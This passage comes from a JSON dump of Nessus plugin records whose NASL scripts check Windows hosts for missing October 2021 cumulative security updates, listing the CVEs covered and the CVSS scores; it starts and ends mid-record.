script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-10';\nkbs = make_list(\n '5006669'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:14393,\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006669])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T20:24:52", "description": "The remote Windows host is missing security update 5006667.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36970, CVE-2021-40455)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36953, CVE-2021-40463)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-40460, CVE-2021-41338)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26441, CVE-2021-26442, CVE-2021-40443, CVE-2021-40449, CVE-2021-40450, CVE-2021-40464, CVE-2021-40466, CVE-2021-40467, CVE-2021-40470, CVE-2021-40476, CVE-2021-40477, CVE-2021-40478, CVE-2021-40488, CVE-2021-40489, CVE-2021-41335, CVE-2021-41339, CVE-2021-41345, CVE-2021-41347)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38662, CVE-2021-38663, CVE-2021-40454, CVE-2021-40475, CVE-2021-41332, CVE-2021-41343)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-40461, CVE-2021-40462, CVE-2021-40465, CVE-2021-41330, CVE-2021-41331, CVE-2021-41340, CVE-2021-41342)", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-10-12T00:00:00", "type": "nessus", "title": "KB5006667: Windows 10 version 1909 Security Update (October 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26441", "CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40450", "CVE-2021-40454", "CVE-2021-40455", "CVE-2021-40460", "CVE-2021-40461", "CVE-2021-40462", "CVE-2021-40463", "CVE-2021-40464", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40470", "CVE-2021-40475", "CVE-2021-40476", "CVE-2021-40477", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41330", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41335", "CVE-2021-41338", "CVE-2021-41339", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343", "CVE-2021-41345", "CVE-2021-41347"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_OCT_5006667.NASL", "href": "https://www.tenable.com/plugins/nessus/154037", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154037);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26441\",\n \"CVE-2021-26442\",\n \"CVE-2021-36953\",\n \"CVE-2021-36970\",\n \"CVE-2021-38662\",\n \"CVE-2021-38663\",\n \"CVE-2021-40443\",\n \"CVE-2021-40449\",\n \"CVE-2021-40450\",\n \"CVE-2021-40454\",\n \"CVE-2021-40455\",\n \"CVE-2021-40460\",\n \"CVE-2021-40461\",\n \"CVE-2021-40462\",\n \"CVE-2021-40463\",\n \"CVE-2021-40464\",\n \"CVE-2021-40465\",\n \"CVE-2021-40466\",\n \"CVE-2021-40467\",\n \"CVE-2021-40470\",\n \"CVE-2021-40475\",\n \"CVE-2021-40476\",\n \"CVE-2021-40477\",\n \"CVE-2021-40478\",\n \"CVE-2021-40488\",\n \"CVE-2021-40489\",\n \"CVE-2021-41330\",\n \"CVE-2021-41331\",\n \"CVE-2021-41332\",\n \"CVE-2021-41335\",\n \"CVE-2021-41338\",\n \"CVE-2021-41339\",\n \"CVE-2021-41340\",\n \"CVE-2021-41342\",\n \"CVE-2021-41343\",\n \"CVE-2021-41345\",\n \"CVE-2021-41347\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0472-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0475-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"MSKB\", value:\"5006667\");\n script_xref(name:\"MSFT\", value:\"MS21-5006667\");\n\n script_name(english:\"KB5006667: Windows 10 version 1909 Security Update (October 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5006667.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36970, CVE-2021-40455)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36953,\n CVE-2021-40463)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-40460, CVE-2021-41338)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26441, CVE-2021-26442, CVE-2021-40443,\n CVE-2021-40449, CVE-2021-40450, CVE-2021-40464,\n CVE-2021-40466, CVE-2021-40467, CVE-2021-40470,\n CVE-2021-40476, CVE-2021-40477, CVE-2021-40478,\n CVE-2021-40488, CVE-2021-40489, CVE-2021-41335,\n CVE-2021-41339, CVE-2021-41345, CVE-2021-41347)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38662, CVE-2021-38663,\n CVE-2021-40454, CVE-2021-40475, CVE-2021-41332,\n CVE-2021-41343)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-40461,\n CVE-2021-40462, CVE-2021-40465, CVE-2021-41330,\n CVE-2021-41331, CVE-2021-41340, CVE-2021-41342)\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5006667\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41345\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-40461\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k NtGdiResetDC Use After Free Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-10';\nkbs = make_list(\n '5006667'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:18363,\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006667])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T18:09:47", "description": "The remote Windows host is missing security update 5006672.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-40456, CVE-2021-40460, CVE-2021-41337, CVE-2021-41338)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36953, CVE-2021-40463)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36970, CVE-2021-40455, CVE-2021-41361)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-40461, CVE-2021-40462, CVE-2021-40465, CVE-2021-40469, CVE-2021-41330, CVE-2021-41331, CVE-2021-41340, CVE-2021-41342)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26441, CVE-2021-26442, CVE-2021-40443, CVE-2021-40449, CVE-2021-40450, CVE-2021-40464, CVE-2021-40466, CVE-2021-40467, CVE-2021-40470, CVE-2021-40476, CVE-2021-40477, CVE-2021-40478, CVE-2021-40488, CVE-2021-40489, CVE-2021-41335, CVE-2021-41345, CVE-2021-41347)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38662, CVE-2021-38663, CVE-2021-40454, CVE-2021-40475, CVE-2021-41332, CVE-2021-41343)", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-10-12T00:00:00", "type": "nessus", "title": "KB5006672: Windows 10 Version 1809 and Windows Server 2019 Security Update (October 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26441", "CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40450", "CVE-2021-40454", "CVE-2021-40455", "CVE-2021-40456", "CVE-2021-40460", "CVE-2021-40461", "CVE-2021-40462", "CVE-2021-40463", "CVE-2021-40464", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40469", "CVE-2021-40470", "CVE-2021-40475", "CVE-2021-40476", "CVE-2021-40477", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41330", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41335", "CVE-2021-41337", "CVE-2021-41338", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343", "CVE-2021-41345", "CVE-2021-41347", "CVE-2021-41361"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_OCT_5006672.NASL", "href": "https://www.tenable.com/plugins/nessus/154026", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154026);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26441\",\n \"CVE-2021-26442\",\n \"CVE-2021-36953\",\n \"CVE-2021-36970\",\n \"CVE-2021-38662\",\n \"CVE-2021-38663\",\n \"CVE-2021-40443\",\n \"CVE-2021-40449\",\n \"CVE-2021-40450\",\n \"CVE-2021-40454\",\n \"CVE-2021-40455\",\n \"CVE-2021-40456\",\n \"CVE-2021-40460\",\n \"CVE-2021-40461\",\n \"CVE-2021-40462\",\n \"CVE-2021-40463\",\n \"CVE-2021-40464\",\n \"CVE-2021-40465\",\n \"CVE-2021-40466\",\n \"CVE-2021-40467\",\n \"CVE-2021-40469\",\n \"CVE-2021-40470\",\n \"CVE-2021-40475\",\n \"CVE-2021-40476\",\n \"CVE-2021-40477\",\n \"CVE-2021-40478\",\n \"CVE-2021-40488\",\n \"CVE-2021-40489\",\n \"CVE-2021-41330\",\n \"CVE-2021-41331\",\n \"CVE-2021-41332\",\n \"CVE-2021-41335\",\n \"CVE-2021-41337\",\n \"CVE-2021-41338\",\n \"CVE-2021-41340\",\n \"CVE-2021-41342\",\n \"CVE-2021-41343\",\n \"CVE-2021-41345\",\n \"CVE-2021-41347\",\n \"CVE-2021-41361\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0472-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0475-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"MSKB\", value:\"5006672\");\n script_xref(name:\"MSFT\", value:\"MS21-5006672\");\n\n script_name(english:\"KB5006672: Windows 10 Version 1809 and Windows Server 2019 Security Update (October 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5006672.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-40456, CVE-2021-40460, CVE-2021-41337,\n CVE-2021-41338)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36953,\n CVE-2021-40463)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36970, CVE-2021-40455,\n CVE-2021-41361)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-40461,\n CVE-2021-40462, CVE-2021-40465, CVE-2021-40469,\n CVE-2021-41330, CVE-2021-41331, CVE-2021-41340,\n CVE-2021-41342)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26441, CVE-2021-26442, CVE-2021-40443,\n CVE-2021-40449, CVE-2021-40450, CVE-2021-40464,\n CVE-2021-40466, CVE-2021-40467, CVE-2021-40470,\n CVE-2021-40476, CVE-2021-40477, CVE-2021-40478,\n CVE-2021-40488, CVE-2021-40489, CVE-2021-41335,\n CVE-2021-41345, CVE-2021-41347)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38662, CVE-2021-38663,\n CVE-2021-40454, CVE-2021-40475, CVE-2021-41332,\n CVE-2021-41343)\");\n # https://support.microsoft.com/en-us/topic/october-12-2021-kb5006672-os-build-17763-2237-f5f567fd-950d-4db0-9d17-09435322578a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e54ed946\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5006672\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41345\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-40461\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k NtGdiResetDC Use After Free Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-10';\nkbs = make_list(\n '5006672'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:17763,\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006672])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T18:10:19", "description": "The remote Windows host is missing security update 5006670.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-40460, CVE-2021-41338, CVE-2021-41346)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36953, CVE-2021-40463)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38662, CVE-2021-38663, CVE-2021-40454, CVE-2021-40468, CVE-2021-40475, CVE-2021-41332, CVE-2021-41343)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26441, CVE-2021-26442, CVE-2021-40443, CVE-2021-40449, CVE-2021-40450, CVE-2021-40464, CVE-2021-40466, CVE-2021-40467, CVE-2021-40470, CVE-2021-40476, CVE-2021-40477, CVE-2021-40478, CVE-2021-40488, CVE-2021-40489, CVE-2021-41334, CVE-2021-41335, CVE-2021-41339, CVE-2021-41345, CVE-2021-41347, CVE-2021-41357)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36970, CVE-2021-40455)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-40461, CVE-2021-40462, CVE-2021-40465, CVE-2021-41330, CVE-2021-41331, CVE-2021-41340, CVE-2021-41342)", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-10-12T00:00:00", "type": "nessus", "title": "KB5006670: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 October 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26441", "CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40450", "CVE-2021-40454", "CVE-2021-40455", "CVE-2021-40456", "CVE-2021-40460", "CVE-2021-40461", "CVE-2021-40462", "CVE-2021-40463", "CVE-2021-40464", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40468", "CVE-2021-40469", "CVE-2021-40470", "CVE-2021-40475", "CVE-2021-40476", "CVE-2021-40477", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41330", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41334", "CVE-2021-41335", "CVE-2021-41337", "CVE-2021-41338", "CVE-2021-41339", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343", "CVE-2021-41345", "CVE-2021-41346", "CVE-2021-41347", "CVE-2021-41357", "CVE-2021-41361"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_OCT_5006670.NASL", "href": "https://www.tenable.com/plugins/nessus/154033", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154033);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26442\",\n \"CVE-2021-36953\",\n \"CVE-2021-36970\",\n \"CVE-2021-38662\",\n \"CVE-2021-38663\",\n \"CVE-2021-40443\",\n \"CVE-2021-40449\",\n \"CVE-2021-40450\",\n \"CVE-2021-40454\",\n \"CVE-2021-40455\",\n \"CVE-2021-40456\",\n \"CVE-2021-40460\",\n \"CVE-2021-40461\",\n \"CVE-2021-40462\",\n \"CVE-2021-40463\",\n \"CVE-2021-40464\",\n \"CVE-2021-40465\",\n \"CVE-2021-40466\",\n \"CVE-2021-40467\",\n \"CVE-2021-40468\",\n \"CVE-2021-40469\",\n \"CVE-2021-40470\",\n \"CVE-2021-40475\",\n \"CVE-2021-40476\",\n \"CVE-2021-40477\",\n \"CVE-2021-40478\",\n \"CVE-2021-40488\",\n \"CVE-2021-40489\",\n \"CVE-2021-41330\",\n \"CVE-2021-41331\",\n \"CVE-2021-41332\",\n \"CVE-2021-41334\",\n \"CVE-2021-41335\",\n \"CVE-2021-41337\",\n \"CVE-2021-41338\",\n \"CVE-2021-41339\",\n \"CVE-2021-41340\",\n \"CVE-2021-41342\",\n \"CVE-2021-41343\",\n \"CVE-2021-41345\",\n \"CVE-2021-41346\",\n \"CVE-2021-41347\",\n \"CVE-2021-41357\",\n \"CVE-2021-41361\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0472-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0475-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"MSKB\", value:\"5006670\");\n script_xref(name:\"MSFT\", value:\"MS21-5006670\");\n\n script_name(english:\"KB5006670: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 October 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5006670.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-40460, CVE-2021-41338, CVE-2021-41346)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36953,\n CVE-2021-40463)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38662, CVE-2021-38663,\n CVE-2021-40454, CVE-2021-40468, CVE-2021-40475,\n CVE-2021-41332, CVE-2021-41343)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26441, CVE-2021-26442, CVE-2021-40443,\n CVE-2021-40449, CVE-2021-40450, CVE-2021-40464,\n CVE-2021-40466, CVE-2021-40467, CVE-2021-40470,\n CVE-2021-40476, CVE-2021-40477, CVE-2021-40478,\n CVE-2021-40488, CVE-2021-40489, CVE-2021-41334,\n CVE-2021-41335, CVE-2021-41339, CVE-2021-41345,\n CVE-2021-41347, CVE-2021-41357)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36970, CVE-2021-40455)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-40461,\n CVE-2021-40462, CVE-2021-40465, CVE-2021-41330,\n CVE-2021-41331, CVE-2021-41340, CVE-2021-41342)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5006670\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update KB5006670.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n 